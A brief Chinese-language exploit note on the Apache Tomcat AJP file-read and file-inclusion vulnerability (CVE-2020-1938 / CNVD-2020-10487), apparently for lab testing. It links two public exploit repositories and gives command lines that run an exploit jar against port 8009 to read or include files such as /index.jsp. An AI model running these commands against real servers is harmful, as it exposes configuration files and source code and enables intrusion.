Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。
此漏洞为文件包含漏洞,攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。
本次设计到的CVE:CNVD-2020-10487、CVE-2020-1938

EXP-1
https://github.com/0nise/CVE-2020-1938
apache-tomcat-8.5.32.zip 测试tomcat
任意文件读取

java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp

文件包含

java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp

打包方式:在目录tomcat/ajp-bug 执行 mvn clean compile assembly:assembly

EXP-2
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

下载:CNVD-2020-10487-Tomcat-Ajp-lfi